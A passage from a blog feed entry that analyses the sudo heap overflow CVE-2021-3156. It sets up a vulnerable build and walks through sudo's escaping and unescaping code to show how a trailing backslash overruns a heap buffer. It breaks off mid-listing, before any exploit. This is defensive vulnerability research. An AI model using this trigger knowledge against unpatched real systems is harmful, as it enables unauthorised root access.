    <category term="vulnerability analysis" scheme="https://kiprey.github.io/categories/vulnerability-analysis/"/>
    
    <category term="v8" scheme="https://kiprey.github.io/categories/vulnerability-analysis/v8/"/>
    
    
    <category term="v8" scheme="https://kiprey.github.io/tags/v8/"/>
    
  </entry>
  
  <entry>
    <title>CVE-2021-3156 Analysis</title>
    <link href="https://kiprey.github.io/2021/01/CVE-2021-3156/"/>
    <id>https://kiprey.github.io/2021/01/CVE-2021-3156/</id>
    <published>2021-01-29T14:38:27.000Z</published>
    <updated>2025-11-24T03:59:39.781Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、前言">I. Preface</h2><ul><li><p><code>sudo</code> is a critical privilege-management program on Linux that lets users run programs with root privileges. CVE-2021-3156 is a heap overflow vulnerability in sudo. Through it, any unprivileged user can gain root privileges under the default sudo configuration.</p></li><li><p>The vulnerability affects all legacy versions of sudo from 1.8.2 through 1.8.31p2, and all stable versions from 1.9.0 through 1.9.5p1.</p><p>The Qualys research team contacted the sudo team on <code>2021-01-13</code> and publicly disclosed the issue on <code>2021-01-26</code>.</p></li><li><p>The root cause of this vulnerability is <strong>fairly simple</strong>, yet it enables a high-risk <strong>privilege escalation</strong> and has a wide impact (one of my virtual machines, a WSL instance, and an Alibaba Cloud server were all vulnerable), which makes it quite interesting. So let us briefly analyze it.</p><span id="more"></span></li></ul><h2 id="二、环境搭建">II. Environment Setup</h2><ul><li><p>First, fetch the sudo source code with the following command:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> apt-get <span class="built_in">source</span> <span class="built_in">sudo</span></span><br></pre></td></tr></table></figure><p>While fetching the source, apt-get points out that the package repository can be cloned directly with git, so we simply clone it:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> https://salsa.debian.org/debian/sudo.git</span><br></pre></td></tr></table></figure></li><li><p>Switch to the target version and build sudo; be careful not to install it.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span 
class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Note: the working directory must be the root of the git repository</span></span><br><span class="line">  <span class="comment"># In my case, the repository root is /usr/class/myPoc/CVE-2021-3156/sudo</span></span><br><span class="line">  <span class="comment"># The terminal I am using here does not have root privileges</span></span><br><span class="line"><span class="comment"># Switch versions. I switched to the last vulnerable version</span></span><br><span class="line">git reset --hard 36955b3ef399efeea25824d32e6cfbaa444e9f07 <span class="comment"># v1.9.5p1</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Build. The options below set the paths where sudo looks for sudo.conf, sudoers, and sudoers.so.</span></span><br><span class="line"><span class="comment"># The generic form is ./configure --sysconfdir=&lt;repo&gt;/examples --with-plugindir=&lt;repo&gt;/plugins/sudoers/.libs  &amp;&amp; make</span></span><br><span class="line">./configure --sysconfdir=/usr/class/myPoc/CVE-2021-3156/sudo/examples --with-plugindir=/usr/class/myPoc/CVE-2021-3156/sudo/plugins/sudoers/.libs/  &amp;&amp; make</span><br><span class="line"></span><br><span class="line"><span class="comment"># Note: sudo.conf, sudoers.so, and sudoers must all be owned by root, otherwise sudo fails to run</span></span><br><span class="line"><span class="built_in">sudo</span> <span class="built_in">chown</span> root:root examples/sudo.conf</span><br><span class="line"><span class="built_in">sudo</span> <span class="built_in">chown</span> root:root examples/sudoers</span><br><span class="line"><span class="built_in">sudo</span> <span class="built_in">chown</span> root:root plugins/sudoers/.libs/sudoers.so</span><br><span 
class="line"></span><br><span class="line"><span class="comment"># Change into the directory that holds the sudo binary</span></span><br><span class="line"><span class="built_in">cd</span> src/.libs</span><br><span class="line"></span><br><span class="line"><span class="comment"># Manually create a sudoedit symlink</span></span><br><span class="line"><span class="built_in">sudo</span> <span class="built_in">ln</span> -s <span class="built_in">sudo</span> sudoedit</span><br><span class="line"></span><br><span class="line"><span class="comment"># Set the environment variable; the generic form is: export LD_LIBRARY_PATH=&quot;&lt;repo&gt;/lib/util/.libs&quot;</span></span><br><span class="line"><span class="built_in">export</span> LD_LIBRARY_PATH=/usr/class/myPoc/CVE-2021-3156/sudo/lib/util/.libs</span><br><span class="line"></span><br><span class="line"><span class="comment"># Set the permissions on sudo</span></span><br><span class="line"><span class="comment"># sudo needs special permissions (owned by root, setuid bit set); set them as follows:</span></span><br><span class="line"><span class="built_in">sudo</span> <span class="built_in">chown</span> root:root ./sudo</span><br><span class="line"><span class="built_in">sudo</span> <span class="built_in">chmod</span> 4755 ./sudo</span><br><span class="line"></span><br><span class="line"><span class="comment"># Run sudo and sudoedit as root</span></span><br><span class="line">./sudo</span><br><span class="line">./sudoedit</span><br></pre></td></tr></table></figure><p>At the end of the setup, the freshly built sudo can be run as root. However, whether or not LD_LIBRARY_PATH is set, an unprivileged user still cannot run it. This is most likely because the dynamic linker ignores LD_LIBRARY_PATH when an unprivileged user launches a setuid binary. The error an unprivileged user gets is:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./sudo: error <span class="keyword">while</span> loading shared libraries: libsudo_util.so.0: cannot open shared object file: No such file or directory</span><br></pre></td></tr></table></figure><p>Since an unprivileged user cannot run this sudo, we debug as root for now.</p></li></ul><h2 id="三、漏洞细节">III. Vulnerability Details</h2><h3 id="1-parse-args-添加转义">1. 
parse_args adds escaping</h3><p>In main, the program calls <code>parse_args</code> to process the arguments passed in. That function contains a code fragment that <strong>escapes special characters</strong>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span 
class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * Command line argument parsing.</span></span><br><span class="line"><span class="comment"> * Sets nargc and nargv which corresponds to the argc/argv we&#x27;ll use</span></span><br><span class="line"><span class="comment"> * for the command to be run (if we are running one).</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">parse_args</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> **argv, <span class="type">int</span> *old_optind, <span class="type">int</span> *nargc, <span class="type">char</span> ***nargv,</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="keyword">struct</span> sudo_settings **settingsp, <span class="type">char</span> ***env_addp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="comment">/*</span></span><br><span class="line"><span class="comment">     * For shell mode we need to rewrite argv</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="comment">// Condition: mode has MODE_RUN set and flags has MODE_SHELL set</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">ISSET</span>(mode, MODE_RUN) &amp;&amp; <span class="built_in">ISSET</span>(flags, MODE_SHELL))</span><br><span 
class="line">    &#123;</span><br><span class="line">        <span class="comment">// Start building the &quot;shell -c &lt;command&gt;&quot; command line</span></span><br><span class="line">        <span class="type">char</span> **av, *cmnd = <span class="literal">NULL</span>;</span><br><span class="line">        <span class="type">int</span> ac = <span class="number">1</span>;</span><br><span class="line">        <span class="keyword">if</span> (argc != <span class="number">0</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">/* shell -c &quot;command&quot; */</span></span><br><span class="line">            <span class="type">char</span> *src, *dst;</span><br><span class="line">            <span class="type">size_t</span> cmnd_size = (<span class="type">size_t</span>)(argv[argc - <span class="number">1</span>] - argv[<span class="number">0</span>]) +</span><br><span class="line">                               <span class="built_in">strlen</span>(argv[argc - <span class="number">1</span>]) + <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line">            cmnd = dst = <span class="built_in">reallocarray</span>(<span class="literal">NULL</span>, cmnd_size, <span class="number">2</span>);</span><br><span class="line">            <span class="comment">// ...</span></span><br><span class="line">            <span class="comment">// Process the arguments passed in</span></span><br><span class="line">            <span class="keyword">for</span> (av = argv; *av != <span class="literal">NULL</span>; av++)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="keyword">for</span> (src = *av; *src != <span class="string">&#x27;\0&#x27;</span>; src++)</span><br><span class="line">                &#123;</span><br><span class="line">                    <span class="comment">/* quote potential meta characters */</span></span><br><span class="line">                    <span 
class="comment">// Escape meta characters: any character that is not alphanumeric and not one of _ - $ gets a `\` prepended in the newly built &lt;command&gt;</span></span><br><span class="line">                    <span class="keyword">if</span> (!<span class="built_in">isalnum</span>((<span class="type">unsigned</span> <span class="type">char</span>)*src) &amp;&amp; *src != <span class="string">&#x27;_&#x27;</span> &amp;&amp; *src != <span class="string">&#x27;-&#x27;</span> &amp;&amp; *src != <span class="string">&#x27;$&#x27;</span>)</span><br><span class="line">                        *dst++ = <span class="string">&#x27;\\&#x27;</span>;</span><br><span class="line">                    *dst++ = *src;</span><br><span class="line">                &#125;</span><br><span class="line">                *dst++ = <span class="string">&#x27; &#x27;</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">if</span> (cmnd != dst)</span><br><span class="line">                dst--; <span class="comment">/* replace last space with a NUL */</span></span><br><span class="line">            *dst = <span class="string">&#x27;\0&#x27;</span>;</span><br><span class="line"></span><br><span class="line">            ac += <span class="number">2</span>; <span class="comment">/* -c cmnd */</span></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        av = <span class="built_in">reallocarray</span>(<span class="literal">NULL</span>, ac + <span class="number">1</span>, <span class="built_in">sizeof</span>(<span class="type">char</span> *));</span><br><span class="line">        <span class="comment">// ...</span></span><br><span class="line"></span><br><span class="line">        av[<span class="number">0</span>] = (<span class="type">char</span> *)user_details.shell; <span class="comment">/* plugin may override shell */</span></span><br><span class="line">        <span class="keyword">if</span> (cmnd != <span class="literal">NULL</span>)</span><br><span 
class="line">        &#123;</span><br><span class="line">            av[<span class="number">1</span>] = <span class="string">&quot;-c&quot;</span>;</span><br><span class="line">            av[<span class="number">2</span>] = cmnd;</span><br><span class="line">        &#125;</span><br><span class="line">        av[ac] = <span class="literal">NULL</span>;</span><br><span class="line"></span><br><span class="line">        argv = av;</span><br><span class="line">        argc = ac;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>When both the MODE_RUN and MODE_SHELL flags are set, control flow enters this block, builds the <code>shell -c &lt;command&gt;</code> command line, and escapes the meta characters in <code>&lt;command&gt;</code> by inserting a backslash before each of them.</p><p>If sudo is run with the <code>-s</code> or <code>-i</code> option, <code>parse_args</code> sets both the MODE_RUN and MODE_SHELL flags:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span 
class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">parse_args</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> **argv, <span class="type">int</span> *old_optind, <span class="type">int</span> *nargc, <span class="type">char</span> ***nargv,</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="keyword">struct</span> sudo_settings **settingsp, <span class="type">char</span> ***env_addp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">/* XXX - should fill in settings at the end to avoid dupes */</span></span><br><span class="line">    <span class="keyword">for</span> (;;)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">/*</span></span><br><span class="line"><span class="comment">         * Some trickiness is required to allow 
environment variables</span></span><br><span class="line"><span class="comment">         * to be interspersed with command line options.</span></span><br><span class="line"><span class="comment">         */</span></span><br><span class="line">        <span class="keyword">if</span> ((ch = <span class="built_in">getopt_long</span>(argc, argv, short_opts, long_opts, <span class="literal">NULL</span>)) != <span class="number">-1</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">switch</span> (ch)</span><br><span class="line">            &#123;</span><br><span class="line">            <span class="comment">// ...</span></span><br><span class="line">            <span class="keyword">case</span> <span class="string">&#x27;i&#x27;</span>:</span><br><span class="line">                sudo_settings[ARG_LOGIN_SHELL].value = <span class="string">&quot;true&quot;</span>;</span><br><span class="line">                <span class="comment">// set MODE_LOGIN_SHELL in flags</span></span><br><span class="line">                <span class="built_in">SET</span>(flags, MODE_LOGIN_SHELL);</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            <span class="comment">// ...</span></span><br><span class="line">            <span class="keyword">case</span> <span class="string">&#x27;s&#x27;</span>:</span><br><span class="line">                sudo_settings[ARG_USER_SHELL].value = <span class="string">&quot;true&quot;</span>;</span><br><span class="line">                <span class="comment">// set MODE_SHELL in flags</span></span><br><span class="line">                <span class="built_in">SET</span>(flags, MODE_SHELL);</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            <span class="comment">// ...</span></span><br><span class="line">            &#125;</span><br><span class="line">        
&#125;</span><br><span class="line">        <span class="comment">// ...</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="keyword">if</span> (!mode)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">/* Defer -k mode setting until we know whether it is a flag or not */</span></span><br><span class="line">        <span class="keyword">if</span> (sudo_settings[ARG_IGNORE_TICKET].value != <span class="literal">NULL</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">if</span> (argc == <span class="number">0</span> &amp;&amp; !(flags &amp; (MODE_SHELL | MODE_LOGIN_SHELL)))</span><br><span class="line">            &#123;</span><br><span class="line">                mode = MODE_INVALIDATE; <span class="comment">/* -k by itself */</span></span><br><span class="line">                sudo_settings[ARG_IGNORE_TICKET].value = <span class="literal">NULL</span>;</span><br><span class="line">                valid_flags = <span class="number">0</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// if mode is still unset at this point, default to MODE_RUN</span></span><br><span class="line">        <span class="keyword">if</span> (!mode)</span><br><span class="line">            mode = MODE_RUN; <span class="comment">/* running a command */</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="comment">// if MODE_LOGIN_SHELL is set</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">ISSET</span>(flags, MODE_LOGIN_SHELL))</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// 
...</span></span><br><span class="line">        <span class="comment">// then MODE_SHELL is set as well</span></span><br><span class="line">        <span class="built_in">SET</span>(flags, MODE_SHELL);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>This is how execution reaches the escaping code shown above.</p><h3 id="2-set-cmnd-取消转义">2. Unescaping in set_cmnd</h3><p>After <code>parse_args</code> returns, execution follows this call chain and eventually reaches <code>set_cmnd</code>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> *argv[], <span class="type">char</span> *envp[])</span></span></span><br><span class="line"><span class="function">    <span class="type">static</span> <span class="type">int</span> <span class="title">policy_check</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">        <span class="type">static</span> <span class="type">int</span> <span class="title">sudoers_policy_check</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">            <span class="type">int</span> <span class="title">sudoers_policy_main</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">                <span class="type">static</span> <span class="type">int</span> <span class="title">set_cmnd</span><span class="params">(<span class="type">void</span>)</span></span></span><br></pre></td></tr></table></figure><p>Note that policy_check 
is only called when the sudo_mode returned by parse_args selects the MODE_RUN case of the switch below, and this is the only conditional on the whole call chain. In the upstream sudo source the MODE_EDIT case falls through to the same branch, which is what the sudoedit path discussed later relies on.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> *argv[], <span class="type">char</span> *envp[])</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="comment">/* Parse command line arguments. 
*/</span></span><br><span class="line">    sudo_mode = <span class="built_in">parse_args</span>(argc, argv, &amp;submit_optind, &amp;nargc, &amp;nargv,</span><br><span class="line">                           &amp;settings, &amp;env_add);</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="keyword">switch</span> (sudo_mode &amp; MODE_MASK)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// ...</span></span><br><span class="line">    <span class="keyword">case</span> MODE_RUN:</span><br><span class="line">        <span class="built_in">policy_check</span>(nargc, nargv, env_add, &amp;command_info, &amp;argv_out,</span><br><span class="line">                     &amp;user_env_out);</span><br><span class="line">        <span class="comment">// ...</span></span><br><span class="line">    &#125;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Inside set_cmnd, the program <strong>unescapes the arguments</strong> when <strong>all three</strong> of the following conditions hold:</p><ul><li>sudo_mode has at least one of MODE_RUN, MODE_EDIT, or MODE_CHECK set.</li><li>NewArgc &gt; 1, i.e. the command to run was given at least one argument.</li><li>sudo_mode also has MODE_SHELL or MODE_LOGIN_SHELL set.</li></ul><p>The relevant code is shown below:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span 
class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * Fill in user_cmnd, user_args, user_base and user_stat variables</span></span><br><span class="line"><span class="comment"> * and apply any command-specific defaults entries.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">set_cmnd</span><span class="params">(<span class="type">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="comment">// MODE condition 1</span></span><br><span class="line">    <span class="keyword">if</span> (sudo_mode &amp; (MODE_RUN | MODE_EDIT | 
MODE_CHECK))</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// ...</span></span><br><span class="line">        <span class="comment">/* set user_args */</span></span><br><span class="line">        <span class="keyword">if</span> (NewArgc &gt; <span class="number">1</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="type">char</span> *to, *from, **av;</span><br><span class="line">            <span class="type">size_t</span> size, n;</span><br><span class="line"></span><br><span class="line">            <span class="comment">/* Alloc and build up user_args. */</span></span><br><span class="line">            <span class="keyword">for</span> (size = <span class="number">0</span>, av = NewArgv + <span class="number">1</span>; *av; av++)</span><br><span class="line">                size += <span class="built_in">strlen</span>(*av) + <span class="number">1</span>;</span><br><span class="line">            <span class="comment">// ...</span></span><br><span class="line">            <span class="comment">// MODE condition 2</span></span><br><span class="line">            <span class="keyword">if</span> (<span class="built_in">ISSET</span>(sudo_mode, MODE_SHELL | MODE_LOGIN_SHELL))</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="comment">/*</span></span><br><span class="line"><span class="comment">                 * When running a command via a shell, the sudo front-end</span></span><br><span class="line"><span class="comment">                 * escapes potential meta chars.  
We unescape non-spaces</span></span><br><span class="line"><span class="comment">                 * for sudoers matching and logging purposes.</span></span><br><span class="line"><span class="comment">                 */</span></span><br><span class="line">                <span class="comment">// iterate over the arguments that were passed in</span></span><br><span class="line">                <span class="keyword">for</span> (to = user_args, av = NewArgv + <span class="number">1</span>; (from = *av); av++)</span><br><span class="line">                &#123;</span><br><span class="line">                    <span class="keyword">while</span> (*from)</span><br><span class="line">                    &#123;</span><br><span class="line">                        <span class="comment">// on a backslash not followed by whitespace, skip the backslash and copy only the character after it</span></span><br><span class="line">                        <span class="comment">// e.g. \$ is copied as $</span></span><br><span class="line">                        <span class="comment">// NOTE: this code assumes the arguments passed to sudo have already been escaped</span></span><br><span class="line">                        <span class="keyword">if</span> (from[<span class="number">0</span>] == <span class="string">&#x27;\\&#x27;</span> &amp;&amp; !<span class="built_in">isspace</span>((<span class="type">unsigned</span> <span class="type">char</span>)from[<span class="number">1</span>]))</span><br><span class="line">                            from++;</span><br><span class="line">                        *to++ = *from++;</span><br><span class="line">                    &#125;</span><br><span class="line">                    *to++ = <span class="string">&#x27; &#x27;</span>;</span><br><span class="line">                &#125;</span><br><span class="line">                *--to = <span class="string">&#x27;\0&#x27;</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="comment">// ...</span></span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span 
class="line">    <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="3-漏洞触发">3. Triggering the vulnerability</h3><h4 id="a-具体细节">a. Details</h4><p>set_cmnd works on the assumption that <strong>the arguments passed to sudo have already been escaped in parse_args</strong>. If an argument instead ends with a <strong>single backslash</strong>, the unescaping loop behaves as follows:</p><ul><li>from[0] is the backslash, and from[1] is the argument's terminating NUL byte.</li><li>Since <code>from[0] == '\\' &amp;&amp; !isspace((unsigned char)from[1])</code> holds, from advances by one byte and now points at the NUL terminator.</li><li><code>*to++ = *from++</code> copies the NUL byte into the user_args heap buffer and advances from once more, to the byte right after the terminator (which is already outside the argument).</li><li>If that byte is not NUL, the loop keeps running and <strong>writes out of bounds</strong> into the user_args heap buffer.</li></ul><p>Normally, though, a <strong>lone backslash</strong> cannot reach set_cmnd: when MODE_SHELL or MODE_LOGIN_SHELL is set, parse_args escapes every special character, backslashes included (MODE_RUN is already set by default).</p><p>However, the condition guarding the unescaping in set_cmnd is not the same as the one guarding the escaping in parse_args.</p><table><thead><tr><th style="text-align:center">Function</th><th style="text-align:center">Mode conditions</th></tr></thead><tbody><tr><td style="text-align:center">parse_args</td><td style="text-align:center">MODE_RUN &amp;&amp; MODE_SHELL</td></tr><tr><td style="text-align:center">set_cmnd</td><td style="text-align:center">(MODE_RUN | MODE_EDIT | MODE_CHECK) &amp;&amp; (MODE_SHELL | MODE_LOGIN_SHELL)</td></tr></tbody></table><p>So can we skip the escaping in parse_args and still reach the unescaping in set_cmnd? In other words, can we set MODE_SHELL while leaving MODE_RUN unset and setting MODE_EDIT or MODE_CHECK instead, so that the escaping is bypassed but the unescaping still runs?</p><blockquote><p>That condition is a bit convoluted, so here it is in short:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">MODE_SHELL &amp;&amp; !MODE_RUN  &amp;&amp; (MODE_EDIT || MODE_CHECK)</span><br></pre></td></tr></table></figure></blockquote><p>At first the answer seems to be no: passing <code>-e</code> or <code>-l</code> to sudo directly restricts valid_flags to MODE_NONINTERACTIVE (for <code>-e</code>) or MODE_NONINTERACTIVE | MODE_LONG_LIST (for <code>-l</code>).</p><p>Since flags contains MODE_SHELL or 
MODE_LOGIN_SHELL at that point, we cannot get past one particular check, <code>(flags &amp; valid_flags) != flags</code>, which evaluates to true and makes sudo exit with a usage message.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">parse_args</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> **argv, <span 
